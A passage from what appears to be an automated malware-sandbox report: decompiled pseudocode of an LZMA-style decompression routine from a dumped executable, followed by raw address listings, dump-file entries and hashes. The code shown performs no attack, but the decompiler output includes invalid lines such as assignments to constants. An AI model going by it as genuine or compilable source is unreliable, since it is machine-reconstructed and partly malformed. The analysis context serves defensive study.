							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                0x00406035
                                                                0x0040603c
                                                                0x00406042
                                                                0x00406048
                                                                0x00000000
                                                                0x0040604c
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x0040606e
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406083
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060ce
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d3
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060eb
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406142
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x00406147
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406164
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061aa
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406852
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x00406888
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00000000
                                                                0x00406a44
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b0
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00000000
                                                                0x00406261
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406244
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x00000000
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00000000
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406520
                                                                0x00406524
                                                                0x00000000
                                                                0x00000000
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00000000
                                                                0x00000000
                                                                0x00406534
                                                                0x00406536
                                                                0x0040653a
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00000000
                                                                0x004065ac
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x004065db
                                                                0x004065db
                                                                0x004065de
                                                                0x004065e5
                                                                0x004065ea
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628c
                                                                0x0040628f
                                                                0x00406292
                                                                0x00406292
                                                                0x00406295
                                                                0x00406298
                                                                0x00000000
                                                                0x00000000
                                                                0x0040629e
                                                                0x004062a4
                                                                0x00000000
                                                                0x00000000
                                                                0x004062aa
                                                                0x004062aa
                                                                0x004062ae
                                                                0x004062b1
                                                                0x004062b4
                                                                0x004062b7
                                                                0x004062ba
                                                                0x004062bb
                                                                0x004062be
                                                                0x004062c0
                                                                0x004062c6
                                                                0x004062c9
                                                                0x004062cc
                                                                0x004062cf
                                                                0x004062d2
                                                                0x004062d5
                                                                0x004062d8
                                                                0x004062f4
                                                                0x004062f7
                                                                0x004062fa
                                                                0x004062fd
                                                                0x00406304
                                                                0x00406308
                                                                0x0040630a
                                                                0x0040630e
                                                                0x004062da
                                                                0x004062da
                                                                0x004062de
                                                                0x004062e6
                                                                0x004062eb
                                                                0x004062ed
                                                                0x004062ef
                                                                0x004062ef
                                                                0x00406311
                                                                0x00406318
                                                                0x0040631b
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406321
                                                                0x00000000
                                                                0x00406326
                                                                0x00406326
                                                                0x0040632a
                                                                0x004069ea
                                                                0x00000000
                                                                0x004069ea
                                                                0x00406330
                                                                0x00406333
                                                                0x00406336
                                                                0x0040633a
                                                                0x0040633d
                                                                0x00406343
                                                                0x00406345
                                                                0x00406345
                                                                0x00406345
                                                                0x00406348
                                                                0x0040634b
                                                                0x0040634b
                                                                0x0040634b
                                                                0x00406351
                                                                0x00000000
                                                                0x00000000
                                                                0x00406353
                                                                0x00406356
                                                                0x00406359
                                                                0x0040635c
                                                                0x0040635f
                                                                0x00406362
                                                                0x00406365
                                                                0x00406368
                                                                0x0040636b
                                                                0x0040636e
                                                                0x00406371
                                                                0x00406389
                                                                0x0040638c
                                                                0x0040638f
                                                                0x00406392
                                                                0x00406392
                                                                0x00406395
                                                                0x00406399
                                                                0x0040639b
                                                                0x00406373
                                                                0x00406373
                                                                0x0040637b
                                                                0x00406380
                                                                0x00406382
                                                                0x00406384
                                                                0x00406384
                                                                0x0040639e
                                                                0x004063a5
                                                                0x004063a8
                                                                0x00000000
                                                                0x004063aa
                                                                0x00000000
                                                                0x004063aa
                                                                0x004063a8
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x004063af
                                                                0x00000000
                                                                0x00000000
                                                                0x004063ea
                                                                0x004063ea
                                                                0x004063ee
                                                                0x004069f6
                                                                0x00000000
                                                                0x004069f6
                                                                0x004063f4
                                                                0x004063f7
                                                                0x004063fa
                                                                0x004063fe
                                                                0x00406401
                                                                0x00406407
                                                                0x00406409
                                                                0x00406409
                                                                0x00406409
                                                                0x0040640c
                                                                0x0040640f
                                                                0x0040640f
                                                                0x00406415
                                                                0x004063b3
                                                                0x004063b3
                                                                0x004063b6
                                                                0x00000000
                                                                0x004063b6
                                                                0x00406417
                                                                0x00406417
                                                                0x0040641a
                                                                0x0040641d
                                                                0x00406420
                                                                0x00406423
                                                                0x00406426
                                                                0x00406429
                                                                0x0040642c
                                                                0x0040642f
                                                                0x00406432
                                                                0x00406435
                                                                0x0040644d
                                                                0x00406450
                                                                0x00406453
                                                                0x00406456
                                                                0x00406456
                                                                0x00406459
                                                                0x0040645d
                                                                0x0040645f
                                                                0x00406437
                                                                0x00406437
                                                                0x0040643f
                                                                0x00406444
                                                                0x00406446
                                                                0x00406448
                                                                0x00406448
                                                                0x00406462
                                                                0x00406469
                                                                0x0040646c
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x0040646e
                                                                0x00000000
                                                                0x004066fb
                                                                0x004066fb
                                                                0x004066ff
                                                                0x00406a26
                                                                0x00000000
                                                                0x00406a26
                                                                0x00406705
                                                                0x00406708
                                                                0x0040670b
                                                                0x0040670f
                                                                0x00406712
                                                                0x00406718
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671a
                                                                0x0040671d
                                                                0x00000000
                                                                0x00000000
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00000000
                                                                0x00000000
                                                                0x0040680a
                                                                0x0040680e
                                                                0x00406830
                                                                0x00406833
                                                                0x0040683d
                                                                0x00406840
                                                                0x00406840
                                                                0x00000000
                                                                0x00406840
                                                                0x00406810
                                                                0x00406813
                                                                0x00406817
                                                                0x0040681a
                                                                0x0040681a
                                                                0x0040681d
                                                                0x00000000
                                                                0x00000000
                                                                0x004068c7
                                                                0x004068cb
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068e9
                                                                0x004068f0
                                                                0x004068f7
                                                                0x004068fe
                                                                0x004068fe
                                                                0x00000000
                                                                0x004068fe
                                                                0x004068cd
                                                                0x004068d0
                                                                0x004068d3
                                                                0x004068d6
                                                                0x004068dd
                                                                0x00406821
                                                                0x00406821
                                                                0x00406824
                                                                0x00000000
                                                                0x00000000
                                                                0x004069b8
                                                                0x004069bb
                                                                0x00000000
                                                                0x00000000
                                                                0x004065f2
                                                                0x004065f4
                                                                0x004065fb
                                                                0x004065fc
                                                                0x004065fe
                                                                0x00406601
                                                                0x00000000
                                                                0x00000000
                                                                0x00406609
                                                                0x0040660c
                                                                0x0040660f
                                                                0x00406611
                                                                0x00406613
                                                                0x00406613
                                                                0x00406614
                                                                0x00406617
                                                                0x0040661e
                                                                0x00406621
                                                                0x0040662f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406905
                                                                0x00406905
                                                                0x00406908
                                                                0x0040690f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406914
                                                                0x00406914
                                                                0x00406918
                                                                0x00406a50
                                                                0x00000000
                                                                0x00406a50
                                                                0x0040691e
                                                                0x00406921
                                                                0x00406924
                                                                0x00406928
                                                                0x0040692b
                                                                0x00406931
                                                                0x00406933
                                                                0x00406933
                                                                0x00406933
                                                                0x00406936
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x00406939
                                                                0x0040693c
                                                                0x0040693c
                                                                0x00406940
                                                                0x004069a0
                                                                0x004069a3
                                                                0x004069a8
                                                                0x004069a9
                                                                0x004069ab
                                                                0x004069ad
                                                                0x004069b0
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x004068bc
                                                                0x00406942
                                                                0x00406948
                                                                0x0040694b
                                                                0x0040694e
                                                                0x00406951
                                                                0x00406954
                                                                0x00406957
                                                                0x0040695a
                                                                0x0040695d
                                                                0x00406960
                                                                0x00406963
                                                                0x0040697c
                                                                0x0040697f
                                                                0x00406982
                                                                0x00406985
                                                                0x00406989
                                                                0x0040698b
                                                                0x0040698b
                                                                0x0040698c
                                                                0x0040698f
                                                                0x00406965
                                                                0x00406965
                                                                0x0040696d
                                                                0x00406972
                                                                0x00406974
                                                                0x00406977
                                                                0x00406977
                                                                0x00406992
                                                                0x00406999
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x0040699b
                                                                0x00000000
                                                                0x00406637
                                                                0x0040663a
                                                                0x00406670
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a0
                                                                0x004067a3
                                                                0x004067a3
                                                                0x004067a6
                                                                0x004067a8
                                                                0x00406a32
                                                                0x00000000
                                                                0x00406a32
                                                                0x004067ae
                                                                0x004067b1
                                                                0x00000000
                                                                0x00000000
                                                                0x004067b7
                                                                0x004067bb
                                                                0x004067be
                                                                0x004067be
                                                                0x004067be
                                                                0x00000000
                                                                0x004067be
                                                                0x0040663c
                                                                0x0040663e
                                                                0x00406640
                                                                0x00406642
                                                                0x00406645
                                                                0x00406646
                                                                0x00406648
                                                                0x0040664a
                                                                0x0040664d
                                                                0x00406650
                                                                0x00406666
                                                                0x0040666b
                                                                0x004066a3
                                                                0x004066a3
                                                                0x004066a7
                                                                0x004066d3
                                                                0x004066d5
                                                                0x004066dc
                                                                0x004066df
                                                                0x004066e2
                                                                0x004066e2
                                                                0x004066e7
                                                                0x004066e7
                                                                0x004066e9
                                                                0x004066ec
                                                                0x004066f3
                                                                0x004066f6
                                                                0x00406723
                                                                0x00406723
                                                                0x00406726
                                                                0x00406729
                                                                0x0040679d
                                                                0x0040679d
                                                                0x0040679d
                                                                0x00000000
                                                                0x0040679d
                                                                0x0040672b
                                                                0x00406731
                                                                0x00406734
                                                                0x00406737
                                                                0x0040673a
                                                                0x0040673d
                                                                0x00406740
                                                                0x00406743
                                                                0x00406746
                                                                0x00406749
                                                                0x0040674c
                                                                0x00406765
                                                                0x00406767
                                                                0x0040676a
                                                                0x0040676b
                                                                0x0040676e
                                                                0x00406770
                                                                0x00406773
                                                                0x00406775
                                                                0x00406777
                                                                0x0040677a
                                                                0x0040677c
                                                                0x0040677f
                                                                0x00406783
                                                                0x00406785
                                                                0x00406785
                                                                0x00406786
                                                                0x00406789
                                                                0x0040678c
                                                                0x0040674e
                                                                0x0040674e
                                                                0x00406756
                                                                0x0040675b
                                                                0x0040675d
                                                                0x00406760
                                                                0x00406760
                                                                0x0040678f
                                                                0x00406796
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x004063b9
                                                                0x004063b9
                                                                0x004063bd
                                                                0x00406a02
                                                                0x00000000
                                                                0x00406a02
                                                                0x004063c3
                                                                0x004063c6
                                                                0x004063c9
                                                                0x004063cc
                                                                0x004063cf
                                                                0x004063d2
                                                                0x004063d5
                                                                0x004063d7
                                                                0x004063da
                                                                0x004063dd
                                                                0x004063e0
                                                                0x004063e2
                                                                0x004063e2
                                                                0x004063e2
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00406582
                                                                0x00406582
                                                                0x00000000
                                                                0x00406582
                                                                0x00406803
                                                                0x00406a38
                                                                0x00406a5a
                                                                0x00406a60
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                                • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 98%
                                                                			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
